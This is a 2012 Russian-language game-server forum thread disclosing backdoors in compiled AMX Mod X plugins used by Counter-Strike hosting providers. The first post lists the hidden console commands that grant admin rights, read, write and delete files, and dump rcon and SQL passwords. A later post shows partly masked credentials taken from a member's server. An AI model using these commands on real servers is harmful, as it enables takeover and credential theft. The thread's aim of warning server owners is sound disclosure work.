|
[ВАЖНО] Stats shell
|
|
|
KinD | Дата: Пятница, 29.06.2012, 17:22 | Сообщение # 1 |
- Сообщения: 1148
- Награды: 22
- Замечания:
|
Quote amx_bancs версия 13.0: В этом плагине есть перенаправление всех игроков на другой сервер. Заходим на любой сервер где стоит плагин, вводим в консоль ban_play er ваш_ип ваш_порт Заглушка: http://c-s.net.ua/forum/ipb.html?act=attac...st&id=16754 Ставить ОБЯЗАТЕЛЬНО перед плагином amx_bancs.amxx statsx_shell: Тут вообще беда, думаю не зря автор назвал его shell, там рельно есть shell. В исходнике его конечно нет, он присутствует в уже скомпилированной версии. Команды: mm_plugins sosim andy_adm - получить админку, права: abcdefghijklmnopqrstu mm_plugins so simandy_del " " - удалить файл
mm_plugins sosima ndy_wr "" "text" - записать в файл
mm_plugins so simandy_rd "" - прочитать файл
mm_plugins sosiman dy_dir "" - показать что в папке
mm_plugins sos itesyki - выводит rcon_password, amx_password_field, amx_sql_host, и т.д и т.п
mm_plugins sosite syki "say Hello" - выполнят команду на сервере
Офф сайт: http://amx-server.blogspot.com/
Почти во всех плагинах есть backdoor.
Такие дела.
PS: Работает не на всех серверах.
Автор:isset
Хочу добавить от себя.
На хостингах Myarena(спасибо Sasha13840 За тест(плагин был установлен через ПУ)
Стоит данные плагин,который заражен этой фигней(нужно проверить на forteam и serva4ok)
Скрин:
Скачивайте заново,компилируйте(не используйте уже скомпилированный amxx)
Офф сайт: http://amx-server.blogspot.com/
Skype:daywerok
|
| |
| |
|
PATRUL | Дата: Пятница, 29.06.2012, 18:08 | Сообщение # 2 |
- Сообщения: 718
- Награды: 5
- Замечания:
|
У меня stats shell стоит backdoor'a нету )
|
| |
| |
|
KinD | Дата: Пятница, 29.06.2012, 18:18 | Сообщение # 3 |
- Сообщения: 1148
- Награды: 22
- Замечания:
|
PATRUL, Прям таки?
RCON: "Za02zy4Ws*********"
PW FIELD: "_pw"
===========================
SQL HOST: "anyhosting.ru"
SQL USER: "patrul***_bans"
SQL PW: "SAD*****"
SQL DB: "patrul****_bans"
SQL TABLE: "admin"
SQL TYPE
Затер все.В личку отправил все данные.
Skype:daywerok
Сообщение отредактировал KinD - Пятница, 29.06.2012, 18:37 |
| |
| |
|
SMaster | Дата: Пятница, 29.06.2012, 18:31 | Сообщение # 4 |
- Сообщения: 2189
- Награды: 46
- Замечания:
|
Хз как можно ставить не проверенные плагины!
---
Да и хостеры мудачье получается.
Люди платят,а тем в лом такие серьезные вещи проверить.
Наша группа вконтакте http://vk.com/nano_world_cs
Контакты:
ICQ 607786179
Skype xonahead
|
| |
| |
|
KinD | Дата: Пятница, 29.06.2012, 18:46 | Сообщение # 5 |
- Сообщения: 1148
- Награды: 22
- Замечания:
|
UPDATE.
Serva4ok тоже с таким плагином =)
Code 1) ;Generated by S4-GPanel (http://serva4ok.ru)
Дальше писать не буду,дальше админки пойдут.
с ForTeam вроде чисто,проверил 6-7 серверов,но там не стояли данные плагины.
Skype:daywerok
Сообщение отредактировал KinD - Пятница, 29.06.2012, 19:12 |
| |
| |
|
Contra63 | Дата: Пятница, 29.06.2012, 19:13 | Сообщение # 6 |
- Сообщения: 830
- Награды: 7
- Замечания:
|
|
| |
| |
|
Sasha13840 | Дата: Пятница, 29.06.2012, 19:16 | Сообщение # 7 |
- Сообщения: 384
- Награды: 7
- Замечания:
|
KinD, Не надо было команды выкладывать.
Щас всякое школоло пойдет сервера крушить
|
| |
| |
|
Contra63 | Дата: Пятница, 29.06.2012, 19:28 | Сообщение # 8 |
- Сообщения: 830
- Награды: 7
- Замечания:
|
Тут вроде нет
|
| |
| |
|
KinD | Дата: Пятница, 29.06.2012, 19:31 | Сообщение # 9 |
- Сообщения: 1148
- Награды: 22
- Замечания:
|
Contra63, Только в скомпилином варианте есть.В исходнике нет.
Skype:daywerok
|
| |
| |
|
PATRUL | Дата: Пятница, 29.06.2012, 20:06 | Сообщение # 10 |
- Сообщения: 718
- Награды: 5
- Замечания:
|
бля пздц)
Взял исходник скомпилировал и посмотрел на плагин,который уже был.. Размеры их очень значительно отличаются... -_-
|
| |
| |
|
KinD | Дата: Пятница, 29.06.2012, 20:07 | Сообщение # 11 |
- Сообщения: 1148
- Награды: 22
- Замечания:
|
PATRUL, А ты говорил,что у тебя нету backdoor 
Skype:daywerok
|
| |
| |
|
Sasha13840 | Дата: Пятница, 29.06.2012, 20:30 | Сообщение # 12 |
- Сообщения: 384
- Награды: 7
- Замечания:
|
 Добавлено (29.06.2012, 20:30)
---------------------------------------------
Я специально не переустанавливал плагин,чтобы посмотреть переустановится он сам или нет
|
| |
| |
|
Sasha13840 | Дата: Суббота, 30.06.2012, 23:06 | Сообщение # 13 |
- Сообщения: 384
- Награды: 7
- Замечания:
|
Им пока в открытую не скажешь,что в плагинах дырка они не чего не сделают.
Наконец то стали проверять свои плагины:
 Добавлено (30.06.2012, 23:06)
---------------------------------------------
И даже спасибо не сказали
|
| |
| |
|
KinD | Дата: Суббота, 30.06.2012, 23:09 | Сообщение # 14 |
- Сообщения: 1148
- Награды: 22
- Замечания:
|
Sasha13840, Проверил на своем хостинге ad_manager чистый =).
Кстати про CSF давно знают,что там Backdoor+редикт команды
Skype:daywerok
|
| |
| |
|
Sasha13840 | Дата: Суббота, 30.06.2012, 23:13 | Сообщение # 15 |
- Сообщения: 384
- Награды: 7
- Замечания:
|
Неужели за те деньги которые им платят сотни людей так трудно проверить плагины?
Ведь myarena это не какой то там захудалый хостинг.
Я от них просто в шоке.
|
| |
| |
|
KinD | Дата: Суббота, 30.06.2012, 23:15 | Сообщение # 16 |
- Сообщения: 1148
- Награды: 22
- Замечания:
|
Sasha13840, скинь weapon_lights.amxx,хочу поглядеть что там.
Skype:daywerok
|
| |
| |
|
Sasha13840 | Дата: Суббота, 30.06.2012, 23:21 | Сообщение # 17 |
- Сообщения: 384
- Награды: 7
- Замечания:
|
Google - не,не слышал?
Откуда он у меня?
|
| |
| |
|
KinD | Дата: Суббота, 30.06.2012, 23:26 | Сообщение # 18 |
- Сообщения: 1148
- Награды: 22
- Замечания:
|
Меня там забанили.
Skype:daywerok
|
| |
| |
|
SMaster | Дата: Суббота, 30.06.2012, 23:29 | Сообщение # 19 |
- Сообщения: 2189
- Награды: 46
- Замечания:
|
Sasha13840, myarena репутацию себе подмочила серьезно.
Если им нужны денежки думаю подумают хоть немного.
А так получается отстойный хостинг на котором лучше не держать сервер или все делать самому в плане плагинов.
Наша группа вконтакте http://vk.com/nano_world_cs
Контакты:
ICQ 607786179
Skype xonahead
|
| |
| |
|
KinD | Дата: Суббота, 30.06.2012, 23:40 | Сообщение # 20 |
- Сообщения: 1148
- Награды: 22
- Замечания:
|
Кстати,не описав проблемы,то можно было спокойно заходить на аренвские сервера(мониторинг Myarena) поочереди красть пароли и тд.Потом продать за кругленькую сумму,ах и да.Там доступ к директориям раставлен не правильно,можно за папку cstrike залезть >>> доступ к чужим серверам.
Skype:daywerok
|
| |
| |
